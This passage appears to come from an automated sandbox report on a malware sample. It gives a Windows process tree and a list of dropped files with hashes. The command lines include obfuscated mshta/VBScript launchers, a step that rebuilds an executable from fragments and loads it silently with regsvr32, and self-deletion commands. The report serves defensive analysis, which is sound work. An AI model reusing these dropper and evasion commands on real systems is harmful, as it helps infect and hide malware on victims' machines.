                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5140
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5AE7.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5AE7.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                PID:5808
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 5AE7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5AE7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:4408
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                      taskkill /im 5AE7.exe /f
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                      PID:5592
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                      PID:2664
                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5952
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5F8B.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5F8B.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2140
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\5F8B.exe"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If """" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\5F8B.exe"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:4540
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\5F8B.exe" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "" == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\5F8B.exe" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5236
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE
                                                                                                                                                                                                                                                                                ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:5396
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCriPt: cLose ( cReatEOBjecT ( "WsCRipT.SHeLl"). Run("CMd.EXe /C Type ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If ""-p0Bd6WU~zT21V9yySfmmv7 "" == """" for %D in ( ""C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE"" ) do taskkill -Im ""%~NXD"" /F " ,0 , TrUE ) )
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:1592
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" > ..\8EqO3YYWQYIWQCG.ExE&& sTaRt ..\8eqO3YYWQyIWqCG.EXE -p0Bd6WU~zT21V9yySfmmv7 & If "-p0Bd6WU~zT21V9yySfmmv7 " == "" for %D in ( "C:\Users\Admin\AppData\Local\Temp\8EqO3YYWQYIWQCG.ExE" ) do taskkill -Im "%~NXD" /F
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:5368
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCrIPT: CLOSE( creAteOBJecT ( "WsCRIpT.ShElL"). RUn ( "C:\Windows\system32\cmd.exe /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = ""MZ"" > 2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s " , 0 , TRuE))
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:3156
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /Q /c eCHo C:\Users\Admin\AppData\Local\TempcSpD> 10Ou8q.9 & ecHO | sET /p = "MZ" >2AQ5.X& COpY /y /b 2Aq5.X + WwZoqDR.Aq_ + 3cQ7SE1.PD + 8jTXBDPR.VQ0 + BhxNJ8.m5W + 10OU8q.9 ..\fLNDPPCP.UUv & DEl /Q *& StArT regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                              PID:200
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                  PID:156
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>2AQ5.X"
                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                    PID:5992
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                    regsvr32.exe ..\fLNDPPcp.UUv /s
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                                                                                                    PID:5400
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                              taskkill -Im "5F8B.exe" /F
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                              PID:5500
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4444
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\63D2.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\63D2.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:4732
                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                            PID:4248
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:4320
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\woqmzizr\jjksytvh.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\woqmzizr\jjksytvh.exe /d"C:\Users\Admin\byvtfqft.exe"
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                              PID:580
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:4844
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              PID:5320
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:2560
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8T9J4.tmp\lylal220.tmp
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8T9J4.tmp\lylal220.tmp" /SL5="$203FA,389391,305664,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:2664
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-P3978.tmp\ElZané_çé_.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-P3978.tmp\ElZané_çé_.exe" /S /UID=lylal220
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                  PID:5664
                                                                                                                                                                                                                                                                                                  • C:\Program Files\Microsoft Office 15\UIGPCBNBBS\irecord.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files\Microsoft Office 15\UIGPCBNBBS\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1472
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-D7E7M.tmp\irecord.tmp
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-D7E7M.tmp\irecord.tmp" /SL5="$1050A,5808768,66560,C:\Program Files\Microsoft Office 15\UIGPCBNBBS\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                        PID:6424
                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          PID:6652
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\cc-7b439-343-7e783-936e998c30dfd\Faecaravege.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\cc-7b439-343-7e783-936e998c30dfd\Faecaravege.exe"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:6440
                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                          dw20.exe -x -s 1996
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:6600
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1b-16710-317-8c9a1-4bea2cc0983b4\Pecofawywy.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1b-16710-317-8c9a1-4bea2cc0983b4\Pecofawywy.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:6536
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                        PID:6384
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                        PID:6660
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                        PID:6924
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                        "LogonUI.exe" /flags:0x0 /state0:0xa3aec055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                        PID:6540
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6280
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:6544
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                            PID:5368
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:6536
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:4168
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                PID:5260
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:6392
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:5380
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:2472
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:6876
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D176.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D176.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:4220
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1860
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:4264

                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_1.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_1.txt
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          a957a80658f31c8fc864755deb2a0ca7

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          8692ad674194f0901ee776ba99704f061babda95

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          99117569330d3694ed281e0c5414c23aa33a5eb370494febb267925dd4a62208

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          b46056d3971718a7770fef54d8a2af34363eb2e785f5506e9cb261c331954d12b810e46b297ebb98ccdf7f9bde73290d46491aa7a3276bdef51869651f7105af

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_2.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_2.txt
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          c6f791cdb3ec5ab080f0d84e9cb1d4eb

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          d22f28ccda8b98265f9dba0c26d3f0cc3e2b6cdf

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d70b6e5dad1618f3d9f08a1d8220c6c34f959db468640b4e21f0b2b5c2507414

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          d41134a4b310d5e640240c1083a39e4e0ffa5c025287060a9cdd94be67a877e6e88f8d85cb6ceca432bdc3de19e95465a560642fb119820105141bd9c57a0d30

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_3.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_3.txt
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          7837314688b7989de1e8d94f598eb2dd

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          889ae8ce433d5357f8ea2aff64daaba563dc94e3

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d8c28d07c365873b4e8332f057f062e65f2dd0cd4d599fd8b16d82eca5cf4247

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          3df0c24a9f51a82716abb8e87ff44fdb6686183423d1f2f7d6bfb4cd03c3a18490f2c7987c29f3e1b2d25c48d428c2e73033998a872b185f70bb68a7aedb3e7c

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_4.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_4.txt
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_5.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_5.txt
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          f12aa4983f77ed85b3a618f7656807c2

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          ab29f2221d590d03756d89e63cf2802ee31ecbcf

                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                          5db1d9e50f0e0e0ba0b15920e65a1b9e3b61bcc03d5930870e0b226b600a72e2

                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                          9074af27996a11e988be7147cf387d8952b515d070ff49fec22f0e5b2d374563204eda56319447d9b5f49f056be1475f0a1a2c501fdf1a769d7d8a8077ccba8b

                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82AD52A4\arnatic_6.exe
                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                          a0b06be5d5272aa4fcf2261ed257ee06

                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                          596c955b854f51f462c26b5eb94e1b6161aad83c

                                                                                                                                                                                                                                                                                                                          SHA256

